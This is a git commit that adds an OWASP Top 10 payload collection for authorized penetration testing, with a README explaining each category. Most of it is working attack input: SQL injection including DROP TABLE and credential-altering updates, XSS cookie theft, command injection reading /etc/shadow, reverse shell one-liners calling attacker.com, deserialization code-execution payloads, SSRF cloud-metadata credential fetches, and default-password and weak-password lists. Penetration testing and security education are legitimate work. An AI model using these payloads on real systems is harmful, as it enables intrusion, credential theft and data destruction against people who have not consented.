Add comprehensive OWASP Top 10 directory structure with injection payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-05-26 19:36:33 +00:00 · 2026-01-04 18:24:32 +00:00
parent ef35e279c7
commit ab9c127df3
28 changed files with 1240 additions and 1 deletions
@@ -0,0 +1,14 @@
+# A01 - Broken Access Control
+
+## Description
+Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits.
+
+## Common Vulnerabilities
+- Path Traversal
+- IDOR (Insecure Direct Object References)
+- Missing Function Level Access Control
+- Forced Browsing
+- Privilege Escalation
+
+## Testing Approach
+Test for access control by manipulating URLs, parameters, and attempting to access resources without proper authorization.
@@ -0,0 +1,40 @@
+# IDOR (Insecure Direct Object Reference) Payloads
+
+# Sequential ID manipulation
+?id=1
+?id=2
+?id=100
+?id=1000
+
+# UUID manipulation
+?user_id=00000000-0000-0000-0000-000000000001
+?user_id=11111111-1111-1111-1111-111111111111
+
+# Username/email enumeration
+?user=admin
+?user=administrator
+?user=root
+?email=admin@example.com
+?username=test
+
+# File/Document IDs
+?file_id=1
+?doc_id=1
+?document=private.pdf
+?report_id=1
+
+# Account/Profile manipulation
+?account_id=1
+?profile_id=1
+?customer_id=1
+
+# Negative and special values
+?id=-1
+?id=0
+?id=999999
+?id=null
+?id=undefined
+
+# Array/Multiple IDs
+?id[]=1&id[]=2
+?ids=1,2,3
@@ -0,0 +1,57 @@
+# Path Traversal Payloads
+
+# Basic traversal
+../
+../../
+../../../
+../../../../
+../../../../../
+../../../../../../
+../../../../../../../
+
+# URL encoded
+..%2F
+..%2F..%2F
+..%2F..%2F..%2F
+..%252f
+..%252f..%252f
+
+# Double URL encoded
+..%252F
+..%252F..%252F
+..%c0%af
+..%c1%9c
+
+# Windows paths
+..\
+..\..\
+..\..\..\
+..%5C
+..%5C..%5C
+..%255C
+
+# Null byte injection
+../../../etc/passwd%00
+../../../etc/passwd%00.jpg
+..%2F..%2F..%2Fetc%2Fpasswd%00
+
+# Common target files
+../../../etc/passwd
+../../../etc/shadow
+../../../etc/hosts
+../../../windows/system32/config/sam
+../../../windows/win.ini
+../../../boot.ini
+..\..\..\..\windows\system.ini
+
+# Web server files
+../../../var/www/html/index.php
+../../../usr/local/apache/conf/httpd.conf
+../../../etc/httpd/conf/httpd.conf
+../../../etc/nginx/nginx.conf
+
+# Application files
+../../../config/database.yml
+../../../.env
+../../../web.config
+../../../application.properties
@@ -0,0 +1,14 @@
+# A02 - Cryptographic Failures
+
+## Description
+Previously known as Sensitive Data Exposure, this category focuses on failures related to cryptography which often lead to exposure of sensitive data. Common issues include weak cryptographic algorithms, improper key management, and data transmitted in clear text.
+
+## Common Vulnerabilities
+- Weak encryption algorithms
+- Hardcoded credentials
+- Insecure key storage
+- Data transmitted in clear text
+- Missing encryption
+
+## Testing Approach
+Look for sensitive data exposure through weak or missing encryption, analyze SSL/TLS configurations, and check for hardcoded secrets.
@@ -0,0 +1,23 @@
+# Common Weak Hashes for Testing
+
+# MD5 hashes (weak)
+5f4dcc3b5aa765d61d8327deb882cf99  # password
+e10adc3949ba59abbe56e057f20f883e  # 123456
+25d55ad283aa400af464c76d713c07ad  # 12345678
+202cb962ac59075b964b07152d234b70  # 123
+
+# SHA1 hashes (weak)
+5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8  # password
+7c4a8d09ca3762af61e59520943dc26494f8941b  # 123456
+7c222fb2927d828af22f592134e8932480637c0d  # 12345678
+
+# Common encoded credentials
+YWRtaW46YWRtaW4=  # admin:admin (base64)
+cm9vdDpyb290  # root:root (base64)
+dGVzdDp0ZXN0  # test:test (base64)
+
+# Common API keys pattern (for detection testing)
+AKIA[0-9A-Z]{16}  # AWS Access Key pattern
+[0-9a-zA-Z]{32}  # Generic 32-char key
+ghp_[0-9a-zA-Z]{36}  # GitHub Personal Access Token pattern
+sk_live_[0-9a-zA-Z]{24}  # Stripe Live Secret Key pattern
@@ -0,0 +1,15 @@
+# A03 - Injection
+
+## Description
+Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
+
+## Common Injection Types
+- SQL Injection
+- Cross-Site Scripting (XSS)
+- Command Injection
+- LDAP Injection
+- XML Injection
+- Template Injection
+
+## Testing Approach
+Submit malicious input containing special characters and observe application behavior, error messages, and response times.
@@ -0,0 +1,80 @@
+# Command Injection Payloads
+
+# Basic command injection
+; ls
+| ls
+|| ls
+& ls
+&& ls
+`ls`
+$(ls)
+
+# Chained commands
+; whoami
+| whoami
+|| whoami
+& whoami
+&& whoami
+
+# Command substitution
+`whoami`
+$(whoami)
+;`whoami`
+;$(whoami)
+
+# File operations
+; cat /etc/passwd
+| cat /etc/passwd
+; cat /etc/shadow
+| cat /etc/shadow
+; ls -la
+| ls -la /
+
+# Windows commands
+& dir
+| dir
+& type C:\Windows\win.ini
+| type C:\boot.ini
+& whoami
+| net user
+
+# Time-based detection
+; sleep 5
+| sleep 5
+& ping -n 5 127.0.0.1
+| ping -c 5 127.0.0.1
+; timeout 5
+& timeout /t 5
+
+# Output redirection
+; ls > /tmp/output.txt
+| ls > /tmp/output.txt
+& dir > C:\temp\output.txt
+
+# URL encoded
+%3B%20ls
+%7C%20ls
+%26%20whoami
+
+# Newline injection
+%0a whoami
+%0d%0a whoami
+\n whoami
+\r\n whoami
+
+# Spaces bypass
+;cat</etc/passwd
+|cat</etc/passwd
+{cat,/etc/passwd}
+cat${IFS}/etc/passwd
+cat$IFS/etc/passwd
+
+# Quotes bypass
+c'a't /etc/passwd
+c"a"t /etc/passwd
+c\at /etc/passwd
+
+# Reverse shell payloads (for testing only)
+; nc -e /bin/sh attacker.com 4444
+| bash -i >& /dev/tcp/attacker.com/4444 0>&1
+& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);"
@@ -0,0 +1,39 @@
+# LDAP Injection Payloads
+
+# Basic LDAP injection
+*
+*(uid=*)
+*(cn=*)
+*(objectClass=*)
+
+# Authentication bypass
+*)(uid=*))(|(uid=*
+*)(|(uid=*))
+*)(cn=admin)(|(cn=*
+admin)(&(uid=*))
+
+# Filter bypass
+*)(objectClass=*))(&(objectClass=*
+*)(|(password=*))
+*)(cn=*)(|(cn=*
+
+# Blind LDAP injection
+*)(cn=a*
+*)(cn=ad*
+*)(cn=adm*
+*)(cn=admin*
+
+# Boolean-based
+(&(uid=admin)(password=*))
+(&(uid=admin)(!(password=wrong)))
+(|(uid=admin)(uid=administrator))
+
+# Wildcard usage
+uid=*
+cn=*
+sn=*
+mail=*
+
+# Attribute extraction
+*)(objectClass=*))(%26(objectClass=*
+*)(uid=*))(%26(uid=*
@@ -0,0 +1,86 @@
+# SQL Injection Payloads
+
+# Basic SQL injection
+'
+''
+' OR '1'='1
+' OR 1=1--
+' OR 'a'='a
+" OR "1"="1
+" OR 1=1--
+admin' --
+admin' #
+admin'/*
+' OR '1'='1' --
+' OR '1'='1' #
+' OR '1'='1'/*
+
+# Union-based SQL injection
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
+' UNION SELECT NULL,NULL,NULL--
+' UNION ALL SELECT NULL--
+' UNION ALL SELECT NULL,NULL--
+' UNION SELECT 1,2,3--
+' UNION ALL SELECT 1,2,3--
+
+# Error-based SQL injection
+' AND 1=CONVERT(int,(SELECT @@version))--
+' AND 1=CAST((SELECT @@version) AS int)--
+' AND EXTRACTVALUE(1,CONCAT(0x5c,@@version))--
+' AND 1=UPDATEXML(1,CONCAT(0x5e24,(SELECT @@version),0x5e24),1)--
+
+# Boolean-based blind SQL injection
+' AND 1=1--
+' AND 1=2--
+' AND SUBSTRING(@@version,1,1)='5'--
+' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--
+
+# Time-based blind SQL injection
+'; WAITFOR DELAY '0:0:5'--
+'; SELECT SLEEP(5)--
+'; SELECT pg_sleep(5)--
+' AND SLEEP(5)--
+' AND 1=BENCHMARK(5000000,MD5('test'))--
+
+# Stacked queries
+'; DROP TABLE users--
+'; DELETE FROM users WHERE 1=1--
+'; INSERT INTO users VALUES ('hacker','pass')--
+'; UPDATE users SET password='hacked' WHERE username='admin'--
+
+# Comment injection
+--
+-- -
+#
+/**/
+/*!50000*/
+
+# Database-specific payloads
+# MySQL
+' AND 'x'='x
+' AND SLEEP(5) AND 'x'='x
+' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
+
+# PostgreSQL
+' AND 'x'='x
+'; SELECT pg_sleep(5)--
+
+# MSSQL
+' AND 'x'='x
+'; WAITFOR DELAY '00:00:05'--
+
+# Oracle
+' AND 'x'='x
+' AND 1=dbms_pipe.receive_message('a',5)--
+
+# SQLite
+' AND 'x'='x
+' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5/2))))--
+
+# NoSQL injection
+{"$gt": ""}
+{"$ne": null}
+{"$where": "sleep(5000)"}
+' || '1'=='1
+admin' || 'a'=='a
@@ -0,0 +1,77 @@
+# XSS (Cross-Site Scripting) Payloads
+
+# Basic XSS
+<script>alert('XSS')</script>
+<script>alert(1)</script>
+<script>alert(document.cookie)</script>
+<script>alert(document.domain)</script>
+<script>alert(window.origin)</script>
+
+# IMG tag XSS
+<img src=x onerror=alert('XSS')>
+<img src=x onerror=alert(1)>
+<img src=javascript:alert('XSS')>
+<img src="x" onerror="alert(String.fromCharCode(88,83,83))">
+<img/src="x"/onerror=alert(1)>
+
+# SVG XSS
+<svg/onload=alert('XSS')>
+<svg onload=alert(1)>
+<svg><script>alert('XSS')</script></svg>
+<svg><animate onbegin=alert(1) attributeName=x dur=1s>
+
+# Body tag XSS
+<body onload=alert('XSS')>
+<body onpageshow=alert(1)>
+<body onfocus=alert(1)>
+
+# Input tag XSS
+<input onfocus=alert(1) autofocus>
+<input onblur=alert(1) autofocus><input autofocus>
+<input/onfocus=alert(1)/autofocus>
+
+# Event handler XSS
+<div onmouseover=alert(1)>test</div>
+<button onclick=alert(1)>click</button>
+<a href="#" onmouseover=alert(1)>link</a>
+
+# Encoded XSS
+&#60;script&#62;alert('XSS')&#60;/script&#62;
+\x3cscript\x3ealert('XSS')\x3c/script\x3e
+<script>alert(String.fromCharCode(88,83,83))</script>
+\u003cscript\u003ealert('XSS')\u003c/script\u003e
+
+# JavaScript protocol
+<a href="javascript:alert('XSS')">click</a>
+<iframe src="javascript:alert('XSS')">
+<object data="javascript:alert('XSS')">
+
+# DOM-based XSS
+<script>document.write('<img src=x onerror=alert(1)>')</script>
+<script>eval(location.hash.substr(1))</script>
+<script>document.location=document.cookie</script>
+
+# Filter bypass
+<scr<script>ipt>alert(1)</scr</script>ipt>
+<ScRiPt>alert(1)</sCrIpT>
+<script>alert(1)<!--
+<script>alert(1)//
+<script>/**/alert(1)</script>
+<script>al\u0065rt(1)</script>
+<svg><script>alert&#40;1&#41;</script>
+
+# Polyglot XSS
+javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+# Attribute-based XSS
+"><script>alert(1)</script>
+'><script>alert(1)</script>
+"><img src=x onerror=alert(1)>
+'><img src=x onerror=alert(1)>
+
+# Template injection XSS
+{{alert(1)}}
+${alert(1)}
+<%= alert(1) %>
+{alert(1)}
@@ -0,0 +1,14 @@
+# A04 - Insecure Design
+
+## Description
+Insecure design is a broad category representing different weaknesses expressed as "missing or ineffective control design." The difference between insecure design and insecure implementation is that design flaws are inherent to the application's architecture.
+
+## Common Vulnerabilities
+- Missing security controls
+- Insufficient threat modeling
+- Insecure design patterns
+- Business logic flaws
+- Missing rate limiting
+
+## Testing Approach
+Test business logic flows, analyze application architecture, and look for missing security controls or flawed design patterns.
@@ -0,0 +1,46 @@
+# Business Logic Testing Payloads
+
+# Price manipulation
+price=-1
+price=0
+price=0.01
+amount=-1000
+quantity=-5
+
+# Discount abuse
+discount=100
+discount=999
+coupon=UNLIMITED
+promo_code=TEST999
+
+# Race condition payloads
+# Send multiple simultaneous requests to:
+POST /transfer (with same account balance)
+POST /redeem (with same coupon code)
+POST /purchase (with same limited item)
+
+# Workflow bypass attempts
+step=1
+step=3
+skip_step=true
+status=completed
+payment_status=paid
+
+# Account enumeration
+username=admin
+username=administrator
+username=test
+email=admin@example.com
+reset_token=00000000-0000-0000-0000-000000000000
+
+# Rate limiting tests
+# Send 1000 requests in 1 second
+# Send 100 login attempts
+# Send 50 password reset requests
+
+# Authentication bypass patterns
+2fa_enabled=false
+verified=true
+is_admin=true
+role=admin
+skip_verification=true
@@ -0,0 +1,15 @@
+# A05 - Security Misconfiguration
+
+## Description
+Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information.
+
+## Common Vulnerabilities
+- Default credentials
+- Unnecessary features enabled
+- Missing security headers
+- Verbose error messages
+- Outdated software
+- Directory listing enabled
+
+## Testing Approach
+Check for default configurations, analyze HTTP headers, test for information disclosure, and verify security settings.
@@ -0,0 +1,41 @@
+# Default Credentials Payloads
+
+# Common username:password combinations
+admin:admin
+admin:password
+administrator:administrator
+root:root
+root:toor
+root:password
+test:test
+guest:guest
+user:user
+demo:demo
+
+# Database default credentials
+root:
+admin:
+sa:
+postgres:postgres
+mysql:mysql
+oracle:oracle
+
+# Application defaults
+admin:admin123
+admin:Admin123
+administrator:password
+webadmin:webadmin
+sysadmin:sysadmin
+
+# IoT/Network device defaults
+admin:1234
+admin:12345
+admin:123456
+root:12345
+ubnt:ubnt
+cisco:cisco
+
+# Format variations
+username: admin / password: (blank)
+username: root / password: (blank)
+username: administrator / password: administrator
@@ -0,0 +1,78 @@
+# Common Misconfiguration Paths
+
+# Admin panels
+/admin
+/admin/
+/administrator
+/admin/login
+/admin/dashboard
+/admincp
+/wp-admin
+/admin.php
+/admin.html
+
+# Configuration files
+/.env
+/config.php
+/configuration.php
+/config.yml
+/config.json
+/settings.py
+/web.config
+/application.properties
+/.git/config
+/.aws/credentials
+
+# Backup files
+/backup.sql
+/database.sql
+/dump.sql
+/.backup
+/old
+/backup
+/bak
+/backup.zip
+/site.tar.gz
+
+# Debug/Info pages
+/phpinfo.php
+/info.php
+/test.php
+/debug
+/trace
+/console
+/server-status
+/server-info
+
+# Directory listing
+/.git/
+/.svn/
+/.hg/
+/backup/
+/temp/
+/tmp/
+/logs/
+/log/
+
+# Error pages that expose info
+/error
+/debug
+/exception
+/trace
+
+# Cloud storage misconfigurations
+/.aws/
+/.azure/
+/s3/
+/.docker/
+/kubernetes/
+
+# API documentation
+/api-docs
+/swagger
+/swagger.json
+/swagger-ui
+/api/v1/documentation
+/docs
+/graphql
+/graphiql
@@ -0,0 +1,14 @@
+# A06 - Vulnerable and Outdated Components
+
+## Description
+Components run with the same privileges as the application itself, so flaws in any component can result in serious impact. Applications using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
+
+## Common Vulnerabilities
+- Outdated libraries
+- Unpatched systems
+- Vulnerable dependencies
+- End-of-life software
+- Unknown component inventory
+
+## Testing Approach
+Identify component versions, check for known CVEs, analyze dependency trees, and use vulnerability scanners.
@@ -0,0 +1,45 @@
+# Common Vulnerable Components to Check
+
+# JavaScript libraries
+jquery-1.x.x (Multiple XSS vulnerabilities)
+jquery-2.x.x (Before 2.2.0 - XSS)
+angular-1.x.x (Template injection)
+lodash-4.17.x (Prototype pollution)
+bootstrap-3.x.x (XSS vulnerabilities)
+moment.js (ReDoS)
+axios-0.18.x (SSRF)
+
+# Java libraries
+log4j-2.x (Log4Shell - CVE-2021-44228)
+spring-framework-4.x.x (Spring4Shell)
+struts-2.x.x (Multiple RCE)
+commons-collections-3.x (Deserialization)
+jackson-databind (Deserialization issues)
+
+# Python packages
+django-1.x.x (Multiple security issues)
+flask-0.x.x (Various vulnerabilities)
+requests-2.x.x (Security issues)
+pillow-<8.3.2 (Path traversal)
+pyyaml-<5.4 (Arbitrary code execution)
+
+# PHP libraries
+phpmailer-<6.5.0 (RCE)
+wordpress-<5.8 (Multiple vulnerabilities)
+symfony-<4.4.35 (Various issues)
+laravel-<8.75 (Authentication bypass)
+
+# Ruby gems
+rails-<6.1.4.2 (Multiple CVEs)
+devise-<4.8.0 (Security issues)
+nokogiri-<1.11.4 (XXE)
+
+# .NET packages
+Newtonsoft.Json-<13.0.1 (Deserialization)
+System.Text.Json-<5.0.2 (DoS)
+
+# Version detection strings
+Server: Apache/2.4.49 (Vulnerable to path traversal)
+X-Powered-By: PHP/7.3.0 (EOL)
+X-AspNet-Version: 4.0.30319
+Server: nginx/1.10.3 (Outdated)
@@ -0,0 +1,15 @@
+# A07 - Identification and Authentication Failures
+
+## Description
+Previously known as Broken Authentication, this category includes failures related to user identity, authentication, and session management. This can allow attackers to compromise passwords, keys, or session tokens, or exploit implementation flaws to assume other users' identities.
+
+## Common Vulnerabilities
+- Weak password requirements
+- Credential stuffing
+- Broken session management
+- Missing multi-factor authentication
+- Insecure password recovery
+- Session fixation
+
+## Testing Approach
+Test authentication mechanisms, session handling, password policies, and account recovery processes.
@@ -0,0 +1,47 @@
+# Authentication Bypass Payloads
+
+# SQL injection authentication bypass
+admin' --
+admin' #
+admin'/*
+' OR '1'='1' --
+' OR 1=1--
+admin' OR '1'='1
+') OR ('1'='1
+' OR 'x'='x
+admin') OR ('1'='1'--
+
+# NoSQL authentication bypass
+{"username": {"$gt": ""}, "password": {"$gt": ""}}
+{"username": {"$ne": null}, "password": {"$ne": null}}
+{"username": "admin", "password": {"$gt": ""}}
+{"username": {"$in": ["admin", "administrator"]}, "password": {"$gt": ""}}
+
+# JSON payload manipulation
+{"username":"admin","password":"admin","role":"admin"}
+{"username":"admin","password":"wrong","isAdmin":true}
+{"username":"admin","is_authenticated":true}
+
+# Session manipulation
+PHPSESSID=admin
+session_id=00000000-0000-0000-0000-000000000001
+token=admin_token
+auth=true
+
+# Parameter pollution
+username=attacker&username=admin
+user=normal&user=admin
+
+# Cookie manipulation
+admin=true
+isAdmin=1
+role=admin
+authenticated=true
+user_level=admin
+
+# Header injection
+X-Forwarded-For: 127.0.0.1
+X-Original-URL: /admin
+X-Rewrite-URL: /admin
+X-Originating-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
@@ -0,0 +1,47 @@
+# Weak Password List
+
+# Common weak passwords
+password
+123456
+12345678
+qwerty
+abc123
+password123
+admin
+letmein
+welcome
+monkey
+
+# Pattern-based weak passwords
+Password1
+Admin123
+Welcome1
+Qwerty123
+Abc12345
+
+# Keyboard patterns
+qwerty
+asdfgh
+zxcvbn
+qwertyuiop
+asdfghjkl
+
+# Number sequences
+123456
+123456789
+1234567890
+000000
+111111
+
+# Company/service related
+company123
+service2023
+admin2023
+user2023
+
+# Dictionary words
+dragon
+football
+baseball
+superman
+batman
@@ -0,0 +1,14 @@
+# A08 - Software and Data Integrity Failures
+
+## Description
+This relates to code and infrastructure that does not protect against integrity violations. This includes insecure deserialization, insecure CI/CD pipelines, and applications that rely on updates, plugins, or libraries from untrusted sources without integrity verification.
+
+## Common Vulnerabilities
+- Insecure deserialization
+- Unverified software updates
+- Insecure CI/CD pipelines
+- Unsigned code execution
+- Missing integrity checks
+
+## Testing Approach
+Test for deserialization vulnerabilities, analyze update mechanisms, check code signing, and verify integrity checks.
@@ -0,0 +1,55 @@
+# Deserialization Payloads
+
+# Java serialized object patterns
+rO0ABXNy
+aced0005
+H4sIAAAAAAAA
+
+# PHP serialization
+O:8:"stdClass":0:{}
+a:1:{i:0;s:5:"admin";}
+O:4:"User":1:{s:4:"role";s:5:"admin";}
+O:10:"Evil_Class":0:{}
+
+# Python pickle
+\x80\x03cos
+(S'whoami'
+tR.
+
+# .NET deserialization
+AAEAAAD/////
+
+# JSON deserialization attacks
+{"@type":"java.net.URL","val":"http://attacker.com"}
+{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('calc')}()"}
+
+# YAML deserialization
+!!python/object/apply:os.system ['calc']
+!!python/object/new:os.system [calc]
+
+# XML deserialization/XXE
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<foo>&xxe;</foo>
+
+# Base64 encoded payloads
+# Java: rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==
+# PHP: TzoxMDoiRXZpbF9DbGFzcyI6MDp7fQ==
+
+# Gadget chains (Java)
+CommonsCollections1
+CommonsCollections2
+CommonsCollections3
+CommonsCollections4
+CommonsCollections5
+CommonsCollections6
+Groovy1
+Spring1
+Spring2
+
+# Node.js deserialization
+{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls')}()"}
+{"__proto__":{"isAdmin":true}}
+
+# Ruby Marshal
+\x04\x08o:\x10User\x06:\x0arole:\x0aadmin
@@ -0,0 +1,15 @@
+# A09 - Security Logging and Monitoring Failures
+
+## Description
+This category helps detect, escalate, and respond to active breaches. Without logging and monitoring, breaches cannot be detected. Insufficient logging, detection, monitoring, and active response occurs at any time.
+
+## Common Vulnerabilities
+- Missing security logs
+- Inadequate log protection
+- No alerting mechanism
+- Logs not monitored
+- Insufficient log detail
+- No incident response
+
+## Testing Approach
+Verify that security-relevant events are logged, logs are protected, alerting mechanisms exist, and incident response procedures are in place.
@@ -0,0 +1,50 @@
+# Log Injection Payloads
+
+# CRLF injection in logs
+\r\n
+\r\nUser: admin logged in successfully
+%0d%0a
+%0d%0aAuthentication successful for admin
+
+# Log poisoning
+\nuser=admin authenticated=true\n
+\r\nSUCCESS: Admin login\r\n
+%0auser:admin%0astatus:success%0a
+
+# Log format manipulation
+admin\nAuthenticated:true
+test\r\nRole:administrator
+
+# Time-based log injection
+[2023-01-01 00:00:00] User admin logged in successfully
+[CRITICAL] Unauthorized access detected
+
+# Null byte injection in logs
+admin\x00
+user\x00admin
+
+# ANSI escape sequences (log injection)
+\x1b[31mCRITICAL\x1b[0m
+\033[1;31mALERT\033[0m
+
+# Log file path traversal
+../../logs/application.log
+/var/log/auth.log
+../../../var/log/syslog
+
+# Events that should be logged (test if they're logged)
+- Failed login attempts
+- Successful login
+- Password changes
+- Privilege escalation
+- Administrative actions
+- Access to sensitive data
+- Invalid input
+- Authentication failures
+- Authorization failures
+
+# Events to check in logs
+SELECT * FROM users WHERE username='admin' AND password='wrong'
+<script>alert('XSS')</script>
+../../../etc/passwd
+; whoami
@@ -0,0 +1,15 @@
+# A10 - Server-Side Request Forgery (SSRF)
+
+## Description
+SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL).
+
+## Common Vulnerabilities
+- Unvalidated URL parameters
+- Internal network scanning
+- Cloud metadata access
+- Local file access via URL schemes
+- Port scanning
+- Service enumeration
+
+## Testing Approach
+Test URL parameters, file upload functionalities, and any feature that fetches external resources. Attempt to access internal resources, cloud metadata endpoints, and local services.
@@ -0,0 +1,85 @@
+# SSRF (Server-Side Request Forgery) Payloads
+
+# Basic SSRF
+http://127.0.0.1
+http://localhost
+http://0.0.0.0
+http://[::1]
+http://[::]
+
+# Port scanning
+http://127.0.0.1:22
+http://127.0.0.1:80
+http://127.0.0.1:443
+http://127.0.0.1:3306
+http://127.0.0.1:5432
+http://127.0.0.1:6379
+http://127.0.0.1:8080
+http://127.0.0.1:27017
+
+# Cloud metadata endpoints
+# AWS
+http://169.254.169.254/latest/meta-data/
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+http://169.254.169.254/latest/user-data/
+
+# Google Cloud
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/
+http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+
+# Azure
+http://169.254.169.254/metadata/instance?api-version=2021-02-01
+http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
+
+# Digital Ocean
+http://169.254.169.254/metadata/v1/
+http://169.254.169.254/metadata/v1/id
+
+# Internal network scanning
+http://192.168.0.1
+http://192.168.1.1
+http://10.0.0.1
+http://172.16.0.1
+
+# Protocol handlers
+file:///etc/passwd
+file:///c:/windows/win.ini
+dict://127.0.0.1:11211/
+gopher://127.0.0.1:6379/_INFO
+ldap://127.0.0.1:389
+tftp://127.0.0.1:69
+
+# Bypassing filters
+# Using decimal IP
+http://2130706433 (127.0.0.1)
+http://3232235521 (192.168.0.1)
+
+# Using octal IP
+http://0177.0.0.1
+http://0x7f.0x0.0x0.0x1
+
+# Using hex IP
+http://0x7f000001
+http://0x7f.0x0.0x0.0x1
+
+# DNS rebinding
+http://spoofed.burpcollaborator.net
+
+# URL encoding
+http://127.0.0.1%23@example.com
+http://example.com@127.0.0.1
+http://127.0.0.1%00.example.com
+http://127.0.0.1%2f%2f@example.com
+
+# IPv6 localhost
+http://[::1]
+http://[0:0:0:0:0:0:0:1]
+http://[0000:0000:0000:0000:0000:0000:0000:0001]
+
+# Redirect-based SSRF
+http://redirect.example.com?url=http://127.0.0.1
+
+# AWS IMDSv2 (requires token)
+TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
+curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
@@ -0,0 +1,130 @@
+# OWASP Top 10 Security Testing Payloads
+
+This directory contains comprehensive payload collections for testing applications against the OWASP Top 10 security risks (2021 edition). These payloads are intended for authorized security testing, penetration testing, and bug bounty hunting only.
+
+## ⚠️ Legal Disclaimer
+
+**IMPORTANT:** These payloads are for educational and authorized testing purposes only. Using these payloads against systems without explicit permission is illegal and unethical. Always obtain proper authorization before conducting security testing.
+
+## Directory Structure
+
+Each OWASP Top 10 category has its own directory containing:
+- **README.md** - Description of the vulnerability category
+- **Payload files** - Collections of test payloads specific to that category
+
+## OWASP Top 10 (2021) Categories
+
+### [A01 - Broken Access Control](./A01-Broken-Access-Control/)
+Testing payloads for access control vulnerabilities including:
+- Path Traversal
+- IDOR (Insecure Direct Object References)
+- Missing function level access control
+
+### [A02 - Cryptographic Failures](./A02-Cryptographic-Failures/)
+Testing payloads for cryptographic weaknesses including:
+- Weak hashing algorithms
+- Hardcoded credentials
+- Insecure key storage
+
+### [A03 - Injection](./A03-Injection/)
+Comprehensive injection payloads including:
+- **SQL Injection** - Database query manipulation
+- **XSS (Cross-Site Scripting)** - Client-side code injection
+- **Command Injection** - OS command execution
+- **LDAP Injection** - Directory service manipulation
+
+### [A04 - Insecure Design](./A04-Insecure-Design/)
+Testing payloads for design flaws including:
+- Business logic vulnerabilities
+- Missing security controls
+- Rate limiting bypass
+
+### [A05 - Security Misconfiguration](./A05-Security-Misconfiguration/)
+Testing payloads for configuration issues including:
+- Default credentials
+- Common misconfiguration paths
+- Directory listing
+
+### [A06 - Vulnerable and Outdated Components](./A06-Vulnerable-Outdated-Components/)
+Reference lists of:
+- Known vulnerable libraries
+- Outdated components
+- Version detection strings
+
+### [A07 - Identification and Authentication Failures](./A07-Identification-Authentication-Failures/)
+Testing payloads for authentication issues including:
+- Authentication bypass techniques
+- Weak password lists
+- Session manipulation
+
+### [A08 - Software and Data Integrity Failures](./A08-Software-Data-Integrity-Failures/)
+Testing payloads for integrity issues including:
+- Deserialization attacks
+- Unsafe deserialization patterns
+
+### [A09 - Security Logging and Monitoring Failures](./A09-Security-Logging-Monitoring-Failures/)
+Testing payloads for logging issues including:
+- Log injection attacks
+- CRLF injection in logs
+
+### [A10 - Server-Side Request Forgery (SSRF)](./A10-Server-Side-Request-Forgery/)
+Testing payloads for SSRF vulnerabilities including:
+- Internal network access
+- Cloud metadata endpoints
+- Protocol handler abuse
+
+## Usage Guidelines
+
+1. **Authorization First**: Always obtain written permission before testing
+2. **Scope Definition**: Only test systems within the authorized scope
+3. **Responsible Disclosure**: Report vulnerabilities responsibly
+4. **Legal Compliance**: Follow all applicable laws and regulations
+5. **Ethical Testing**: Never cause damage or access sensitive data without permission
+
+## Testing Methodology
+
+1. **Reconnaissance**: Understand the target application
+2. **Vulnerability Identification**: Use payloads to identify potential issues
+3. **Exploitation**: Validate vulnerabilities safely
+4. **Documentation**: Record findings with evidence
+5. **Reporting**: Submit detailed vulnerability reports
+
+## Payload Usage
+
+Payloads can be used in various contexts:
+- **URL Parameters**: `?param=<payload>`
+- **POST Data**: Form fields and JSON/XML bodies
+- **Headers**: Custom HTTP headers
+- **Cookies**: Cookie values
+- **File Uploads**: File content and metadata
+
+## Tools Integration
+
+These payloads can be integrated with:
+- Burp Suite
+- OWASP ZAP
+- ffuf/wfuzz
+- SQLMap
+- Custom scripts
+
+## Contributing
+
+This is a living resource. Contributions of new payloads, techniques, or improvements are welcome. Please ensure all contributions:
+- Follow the existing structure
+- Include clear documentation
+- Focus on educational/testing value
+- Maintain ethical standards
+
+## Resources
+
+- [OWASP Top 10 Official Site](https://owasp.org/www-project-top-ten/)
+- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
+- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
+
+## Version
+
+Based on OWASP Top 10 - 2021
+
+---
+
+**Remember**: With great power comes great responsibility. Use these resources ethically and legally.